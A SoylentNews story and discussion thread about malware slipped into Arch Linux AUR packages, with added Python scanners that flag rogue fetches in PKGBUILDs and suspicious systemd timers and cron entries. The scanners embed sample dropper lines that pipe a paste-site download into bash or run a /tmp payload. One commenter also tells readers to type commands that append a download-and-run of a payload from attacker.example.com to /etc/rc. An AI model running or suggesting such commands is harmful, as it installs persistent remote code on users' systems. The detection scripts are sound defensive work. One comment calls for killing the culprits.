
SoylentNews is people

posted by mrpg on Thursday July 12 2018, @09:40AM
from the allows-anyone-to-take-over dept.

Submitted via IRC for Fnord666

[...] Malware has been discovered in at least three Arch Linux packages available on AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages.

[...] The incident happened because AUR allows anyone to take over "orphaned" repositories that have been abandoned by their original authors.

[...] According to a Git commit to the package's source code, xeactor added malicious code that would download a file named "~x" from ptpb.pw, a lightweight site mimicking Pastebin that allows users to share small pieces of texts.

[...] Besides downloading ~u, the main purpose of the first file (~x) was also to modify systemd and add a timer to run the ~u file every 360 seconds.

[...] No other malicious actions were observed, meaning the acroread package wasn't harming users' systems, but merely collecting data in preparation for... something else.

Source: Malware Found in Arch Linux AUR Package Repository
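One way to catch the pattern the summary describes before makepkg runs it, as an added example (not tooling from Arch, the AUR or the linked write-up): a line-based scan of a PKGBUILD for fetches inside build()/package() that source=() and the checksum arrays never cover, downloads piped into a shell, known paste-site hosts, 'SKIP' checksums and writes to the live systemd unit directory. The host list, the sample package (name, version, URL) and the exact dropper line are constructed assumptions, not the real AUR diff.

```python
"""Static red-flag scan of a PKGBUILD, added here as an example; it is not
tooling from Arch, the AUR or the linked write-up.

makepkg checksums only the files listed in source=(); a curl or wget inside
build()/package() is executed, never verified. That is the gap the takeover
above used: the PKGBUILD grew a line fetching ~x from a paste site. The host
list, the sample package and the exact dropper line are assumptions.
"""
import re

SUSPICIOUS_HOSTS = {"ptpb.pw", "pastebin.com", "hastebin.com"}   # assumed paste/dropper hosts
FUNC_RE = re.compile(r"^\s*(prepare|build|check|package(?:_[\w.+-]+)?)\s*\(\)\s*\{")
FETCH_RE = re.compile(r"\b(?:curl|wget|git\s+clone|fetch)\b")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)[^\s'\"]*")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:ba|z|da)?sh\b")
SYSTEMD_DIR_RE = re.compile(r"/(?:etc|usr/lib|run)/systemd/system/")
SUMS_RE = re.compile(r"^\s*(?:md5|sha1|sha224|sha256|sha384|sha512|b2)sums(?:_\w+)?=\(")


def source_hosts(text):
    """Hosts named in source=() / source_<arch>=(): the only downloads makepkg checksums."""
    hosts = set()
    for array in re.finditer(r"^\s*source(?:_\w+)?=\((.*?)\)", text, re.S | re.M):
        hosts.update(h.lower() for h in URL_RE.findall(array.group(1)))
    return hosts


def audit_pkgbuild(text):
    """Return (line_no, reason, line) findings for one PKGBUILD."""
    declared = source_hosts(text)
    findings = []
    in_func, depth = None, 0
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        # 'SKIP' turns verification off for that entry (single-line sums arrays only here).
        if SUMS_RE.match(line) and re.search(r"['\"]SKIP['\"]", line):
            findings.append((no, "checksum verification disabled with SKIP", stripped))
        opened = FUNC_RE.match(line)
        if opened and in_func is None:
            in_func, depth = opened.group(1), 1
            continue
        if in_func is None:
            continue
        depth += line.count("{") - line.count("}")   # "${pkgdir}" nets to zero
        if depth <= 0:
            in_func = None
            continue
        if stripped.startswith("#"):
            continue
        hosts = {h.lower() for h in URL_RE.findall(line)}
        if FETCH_RE.search(line) and (not hosts or hosts - declared):
            findings.append((no, f"network fetch in {in_func}() not covered by source=(): {sorted(hosts)}", stripped))
        if PIPE_TO_SHELL_RE.search(line):
            findings.append((no, f"download piped straight into a shell in {in_func}()", stripped))
        for host in sorted(hosts & SUSPICIOUS_HOSTS):
            findings.append((no, f"reference to paste site {host}", stripped))
        if SYSTEMD_DIR_RE.search(line) and "pkgdir" not in line:
            findings.append((no, f"{in_func}() touches the live systemd unit directory", stripped))
    return findings


PLACEHOLDER_SHA256 = "0" * 64   # stands in for a real checksum in the constructed sample

# Constructed sample shaped like the takeover described above; name, version,
# URL and the dropper line are assumptions, not the real AUR diff.
SAMPLE_PKGBUILD = """\
# Maintainer: (orphan, adopted)
pkgname=acroread
pkgver=1.0
pkgrel=9
arch=('i686' 'x86_64')
source=("https://example.org/AdbeRdr-${pkgver}-enu.bin")
sha256sums=('SHA256_PLACEHOLDER')

package() {
    cd "${srcdir}"
    install -Dm755 "AdbeRdr-${pkgver}-enu.bin" "${pkgdir}/opt/acroread/install.bin"
    curl -s https://ptpb.pw/~x | bash -
}
""".replace("SHA256_PLACEHOLDER", PLACEHOLDER_SHA256)

CLEAN_PKGBUILD = SAMPLE_PKGBUILD.replace("    curl -s https://ptpb.pw/~x | bash -\n", "")

if __name__ == "__main__":
    for no, reason, line in audit_pkgbuild(SAMPLE_PKGBUILD):
        print(f"line {no}: {reason}\n    {line}")
```

The scan is a pre-filter for the read-through the comments recommend, not a replacement for it: it works line by line, so a fetch assembled from variables or hidden in a patch file slips past it, and makepkg's own verification covers only source=() in any case (and not even that with 'SKIP' or --skipchecksums).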



  • (Score: 1, Insightful) by Anonymous Coward on Thursday July 12 2018, @09:58AM (7 children)

    by Anonymous Coward on Thursday July 12 2018, @09:58AM (#706151)

    AUR is a user maintained repository, clearly stated in bold text on the front page.

    Always review pkgbuild and patch files.

    • (Score: 5, Insightful) by Anonymous Coward on Thursday July 12 2018, @10:27AM (3 children)

      by Anonymous Coward on Thursday July 12 2018, @10:27AM (#706156)

      This is a big deal. Common repositories like this one - even with a disclaimer (what software doesn't deny liability and accountability?) - should be trustworthy. The fact that this instance hasn't done any harm yet is just a matter of timing and good fortune.

      Maybe this was just a trial balloon, or it was laying the foundation for something bigger.

      Always review pkgbuild and patch files.

      If every user is expected to be knowledgeable enough to identify issues when reviewing packages before they're installed, the current Linux install base will shrink a lot.

      • (Score: 0) by Anonymous Coward on Thursday July 12 2018, @11:02AM

        by Anonymous Coward on Thursday July 12 2018, @11:02AM (#706165)

        if every user

        Most users will use the official, binary package repository.

        reviewing packages

        It's more akin to the BSD ports system. Nothing difficult about reviewing a typical pkgbuild [archlinux.org]

      • (Score: 4, Insightful) by pD-brane on Thursday July 12 2018, @11:21AM

        by pD-brane (6728) on Thursday July 12 2018, @11:21AM (#706168)

        But it is not an official repository. There is no reason to trust the AUR. Moreover, even proprietary software is allowed in the AUR, so I don't understand why anyone would trust this repository.

        Not everyone cares about the number of users. Therefore, I will here try to present a group of users different from those adhering to "The bigger installed base the better!". I would like to use a secure operating system with trusted repositories. Possibly Arch Linux without AUR is that. If I really need something that's provided by AUR, I review the build scripts and/or make a judgement call based on e.g. who signed the package.

        There is no absolute, though. I am using OpenBSD's packages (different from ports), all free software. I don't think there are big risks with this; packages [openbsd.org] are actually of a high quality, but by definition it is not part of the base system.

      • (Score: 3, Touché) by http on Thursday July 12 2018, @09:12PM

        by http (1920) on Thursday July 12 2018, @09:12PM (#706363)

      This is Arch, not Ubuntu. They do their best in so many ways to keep noobs from installing linux.

        --
        I browse at -1 when I have mod points. It's unsettling.
    • (Score: 1, Informative) by Anonymous Coward on Thursday July 12 2018, @10:31AM (2 children)

      by Anonymous Coward on Thursday July 12 2018, @10:31AM (#706157)

      http://slackbuilds.org/ [slackbuilds.org]
      Our goal is to have the largest collection of SlackBuild scripts available while still ensuring that they are of the highest quality - we test every submission prior to inclusion in the repository.

      • (Score: 0) by Anonymous Coward on Thursday July 12 2018, @01:18PM (1 child)

        by Anonymous Coward on Thursday July 12 2018, @01:18PM (#706186)

        systemd free

        • (Score: 2) by DannyB on Thursday July 12 2018, @02:13PM

          by DannyB (5839) Subscriber Badge on Thursday July 12 2018, @02:13PM (#706202) Journal

          . . . of any worthwhile reason to exist.

          --
          The lower I set my standards the more accomplishments I have.
  • (Score: 1, Funny) by Deeo Kain on Thursday July 12 2018, @11:19AM (8 children)

    by Deeo Kain (5848) on Thursday July 12 2018, @11:19AM (#706167)

    Besides downloading ~u, the main purpose of the first file (~x) was also to modify systemd

    When something smells fishy, there's always systemd involved.

    • (Score: 2) by jasassin on Thursday July 12 2018, @12:49PM (3 children)

      by jasassin (3566) <jasassin@gmail.com> on Thursday July 12 2018, @12:49PM (#706179) Homepage Journal

      Besides downloading ~u, the main purpose of the first file (~x) was also to modify systemd
      When something smells fishy, there's always systemd involved.

      Just curious... what's the difference between a malicious payload modifying inetd or inetd.conf or making a new crontab entry?

      It just seems to me systemd doesn't have much to do with this.

      --
      jasassin@gmail.com GPG Key ID: 0xE6462C68A9A3DB5A
      • (Score: 2) by Deeo Kain on Thursday July 12 2018, @03:19PM (2 children)

        by Deeo Kain (5848) on Thursday July 12 2018, @03:19PM (#706233)

        When was it the last time a system was compromised because a sysv init script or init itself was hacked?

        • (Score: 2) by unauthorized on Thursday July 12 2018, @05:51PM (1 child)

          by unauthorized (3776) on Thursday July 12 2018, @05:51PM (#706283)

          Type the following in your terminal to find out:

          echo "wget -qO /tmp/.payload attacker.example.com/~u" >> /etc/rc
          echo "chmod +x /tmp/.payload" >> /etc/rc
          echo "/tmp/.payload" >> /etc/rc
          date

          • (Score: 2) by Pav on Friday July 13 2018, @02:17AM

            by Pav (114) on Friday July 13 2018, @02:17AM (#706466)

            bash: /etc/rc: Permission denied

            BTW, I do know the real problem is a missing /usr/lib/humour.so

    • (Score: 3, Informative) by unauthorized on Thursday July 12 2018, @12:50PM (2 children)

      by unauthorized (3776) on Thursday July 12 2018, @12:50PM (#706181)

      You can do the same thing with an init script. Every init system is vulnerable to attacks from a local root account.

      • (Score: 2) by Deeo Kain on Thursday July 12 2018, @03:23PM (1 child)

        by Deeo Kain (5848) on Thursday July 12 2018, @03:23PM (#706235)

        No, you cannot. Init is so simple, it's rock solid.
        systemd on the other hand is such a convoluted, exceedingly complicated and overengineered piece of crapsoftware it's rife with security and manageability issues.

        • (Score: 2) by HiThere on Thursday July 12 2018, @05:59PM

          by HiThere (866) Subscriber Badge on Thursday July 12 2018, @05:59PM (#706286) Journal

          The complexity of systemd is a good reason to be skeptical of it. There are others. But your argument that initd is invulnerable to local root based attacks is just foolish. Local root can do *anything* to the system (that isn't overridden by boot time firmware).

          --
          Javascript is what you use to allow unknown third parties to run software you have no idea about on your computer.
    • (Score: 3, Insightful) by darkfeline on Thursday July 12 2018, @08:54PM

      by darkfeline (1030) on Thursday July 12 2018, @08:54PM (#706355) Homepage

      Please stop this, you're making people who have reasonable complaints about systemd look bad.

      Blindly running malicious code on your computer has got nothing to do with systemd, just like blindly running malicious code on your computer has got nothing to do with initscripts if the malicious code plants itself in /etc/init.d/, or with OpenRC and /etc/rc.d.

      --
      Join the SDF Public Access UNIX System today!
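The thread's point that the init system is incidental, as an added example (not code from the write-up, the AUR or any init system's own tooling): one policy, "fires every few minutes and runs something no package installed", applied to a systemd timer/service pair shaped like the 360-second timer in the summary and to an /etc/crontab-style file. Unit contents, the /tmp path, the trusted-directory list and the 15-minute threshold are assumptions made for this example.

```python
"""Hunt for timer-style persistence, added here as an example; not code from the
incident write-up, the AUR or any init system. The dropper in the story ran ~u
from a systemd timer every 360 s; with root the same foothold is a cron entry.
Trusted paths, the threshold and the sample contents are assumptions.
"""
import re

TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/bin/", "/sbin/")
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl", "env"}
MAX_PERIODIC_SECS = 900   # policy: more often than every 15 minutes is worth a look
SPAN_UNITS = {"": 1, "s": 1, "sec": 1, "second": 1, "seconds": 1,
              "m": 60, "min": 60, "minute": 60, "minutes": 60,
              "h": 3600, "hr": 3600, "hour": 3600, "hours": 3600}


def parse_span(value):
    """systemd time span ('360', '6min', '1h 30min') -> seconds; None if unparsable."""
    parts = re.findall(r"(\d+)\s*([a-z]*)", value.strip().lower())
    if not parts or any(unit not in SPAN_UNITS for _, unit in parts):
        return None
    return sum(int(num) * SPAN_UNITS[unit] for num, unit in parts)


def parse_unit(text):
    """Minimal INI parse of a unit file -> {section: {key: [values]}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line[0] == "[" and line[-1] == "]":
            current = sections.setdefault(line[1:-1], {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            current.setdefault(key.strip(), []).append(value.strip())
    return sections


def unpackaged(command):
    """True when what actually runs lives outside TRUSTED_PREFIXES; a leading
    interpreter ('sh /tmp/x', '/usr/bin/env python3 /tmp/x') is skipped."""
    words = command.split()
    if not words:
        return False
    exe = words[0].lstrip("-@+!:")   # systemd ExecStart= prefix characters
    while exe.rsplit("/", 1)[-1] in INTERPRETERS and len(words) > 1:
        words = [w for w in words[1:] if not w.startswith("-")]
        if not words:
            return False
        exe = words[0]
    return not exe.startswith(TRUSTED_PREFIXES)


def audit_systemd_timer(timer_text, service_text):
    """Findings for a .timer/.service pair. Only the repeating *Sec= keys count as
    periodic; OnCalendar= needs systemd's calendar grammar and is left alone."""
    timer, service = parse_unit(timer_text), parse_unit(service_text)
    findings = []
    for key in ("OnUnitActiveSec", "OnUnitInactiveSec"):
        for value in timer.get("Timer", {}).get(key, []):
            secs = parse_span(value)
            if secs is not None and secs <= MAX_PERIODIC_SECS:
                findings.append(f"{key}={value} repeats every {secs}s")
    for command in service.get("Service", {}).get("ExecStart", []):
        if unpackaged(command):
            findings.append(f"ExecStart runs an unpackaged executable: {command}")
    return findings


def audit_crontab(text, system_wide=False):
    """Findings for crontab text; /etc/crontab-style files carry a user column."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        words = line.split()
        if not words or words[0][0] == "#" or "=" in words[0]:
            continue                      # blank, comment or VAR=value
        if words[0][0] == "@":            # @reboot, @hourly, ...
            minute, rest = None, words[1:]
        elif len(words) >= 6:
            minute, rest = words[0], words[5:]
        else:
            continue
        command = " ".join(rest[1:] if system_wide else rest)
        step = re.fullmatch(r"\*/(\d+)", minute or "")
        interval = 60 if minute == "*" else (60 * int(step.group(1)) if step else None)
        if interval is not None and interval <= MAX_PERIODIC_SECS:
            findings.append(f"line {no}: minute field '{minute}' fires every {interval}s")
        if command and unpackaged(command):
            findings.append(f"line {no}: unpackaged command: {command}")
    return findings


# Constructed samples shaped like the 360-second timer above; unit contents and
# the /tmp path are assumptions, not the real artefacts.
DROPPER_TIMER = "[Timer]\nOnBootSec=60\nOnUnitActiveSec=360\n\n[Install]\nWantedBy=timers.target\n"
DROPPER_SERVICE = "[Service]\nType=oneshot\nExecStart=/bin/sh /tmp/~u\n"
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m  h dom mon dow  user  command   (constructed /etc/crontab-style sample)
17  *  *   *   *    root  /usr/bin/run-parts /etc/cron.hourly
*/5 *  *   *   *    root  /bin/sh /tmp/~u
@reboot             root  /home/ops/.cache/.u
"""
```

On a live host the inputs are `systemctl list-timers --all` plus the unit files under /etc/systemd/system and /run/systemd/system, and /etc/crontab, /etc/cron.d and the per-user spools; the interpreter-skipping in unpackaged() matters because a dropper will almost always be `sh /some/path` rather than a bare binary, and judging only the first word would wave it through.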
  • (Score: 2) by DannyB on Thursday July 12 2018, @02:20PM (7 children)

    by DannyB (5839) Subscriber Badge on Thursday July 12 2018, @02:20PM (#706205) Journal

    It's a good thing that nothing bad [networkworld.com] could happen to Gentoo, which is what Google's Chrome OS is based on.

    --
    The lower I set my standards the more accomplishments I have.
    • (Score: 5, Funny) by takyon on Thursday July 12 2018, @04:33PM (6 children)

      by takyon (881) <takyonNO@SPAMsoylentnews.org> on Thursday July 12 2018, @04:33PM (#706257) Journal

      Switch to Microsoft Windows Linux [wikipedia.org], bro. It's got this new and improved "closed source" security model. Check it out!

      --
      [SIG] 10/28/2017: Soylent Upgrade v14 [soylentnews.org]
      • (Score: 3, Insightful) by DannyB on Thursday July 12 2018, @05:27PM (1 child)

        by DannyB (5839) Subscriber Badge on Thursday July 12 2018, @05:27PM (#706276) Journal

        The bad thing about WSL is that it is Microsoft Linux. So you use WSL and develop your Linux application. You go to deploy it in production on genuine Linux and it doesn't work due to some subtle incompatibility. "Oh, well" management says "we'll just deploy it on Windows in production."

        --
        The lower I set my standards the more accomplishments I have.
        • (Score: 0) by Anonymous Coward on Friday July 13 2018, @01:42AM

          by Anonymous Coward on Friday July 13 2018, @01:42AM (#706444)

          That happened to you? Or whom?

      • (Score: 2, Interesting) by realDonaldTrump on Thursday July 12 2018, @10:53PM (3 children)

        by realDonaldTrump (6614) on Thursday July 12 2018, @10:53PM (#706394) Homepage Journal

        Great company, one of the biggest. And maybe they can help us close up that internet too. We're losing so many people to internet!

        • (Score: 2) by Runaway1956 on Friday July 13 2018, @02:54PM (2 children)

          by Runaway1956 (2926) Subscriber Badge on Friday July 13 2018, @02:54PM (#706643) Journal

          Babbling again? WTF did you just say? No - forget that. WTF did you mean?

          • (Score: 2) by realDonaldTrump on Friday July 13 2018, @03:44PM (1 child)

            by realDonaldTrump (6614) on Friday July 13 2018, @03:44PM (#706656) Homepage Journal

            Microsoft, one of our great cyber companies, one of the biggest. They have made tremendous progress and the future of the Microsoft is very bright. Especially since they got .@BillGates [twitter.com] out as Chairman. Now they're doing "'closed source' security." And we want that for our internet, to help close up our internet. We have ISIS on our internet, we have sex traffickers on our internet. And we're losing many people. China closed up their internet (Golden Shield) and it's been PERFECTO for them. And we're moving very strongly on that one. Very strongly!

            • (Score: 2) by Runaway1956 on Friday July 13 2018, @04:18PM

              by Runaway1956 (2926) Subscriber Badge on Friday July 13 2018, @04:18PM (#706676) Journal

              Uhhh, ohkay - you're some kind of gullible fool.

              Did you know that Microsoft operating systems are unique? All OTHER operating systems were built on top of security. That is, everything is owned by someone, whether it be root, or a user, or SYSTEM - everything is owned, and no one can take it, or use it. Microsoft? Everything that passes for "security" is just bolted on, as an afterthought.

              Microsoft security is an oxymoron, just like military intelligence.

  • (Score: -1, Flamebait) by Anonymous Coward on Thursday July 12 2018, @04:58PM (1 child)

    by Anonymous Coward on Thursday July 12 2018, @04:58PM (#706269)

    Find the pricks responsible for this.

    And kill them.

    Please.

    Humanity will thank you.

    • (Score: 0) by Anonymous Coward on Friday July 13 2018, @06:18PM

      by Anonymous Coward on Friday July 13 2018, @06:18PM (#706720)

      I tend to agree, but this might have been meant as a friendly warning to AUR users.

  • (Score: 2) by requerdanos on Thursday July 12 2018, @08:44PM

    by requerdanos (5997) Subscriber Badge on Thursday July 12 2018, @08:44PM (#706350) Journal

    No other malicious actions were observed, meaning the acroread package wasn't harming users' systems

    FYI, "acroread" is the Adobe brand Acrobat reader for PDF files (the one that features the exploit of the day/week/month sort of like the Radio Shack free battery of the month club). Saying it's not harmful is either very naive or simply misleading.
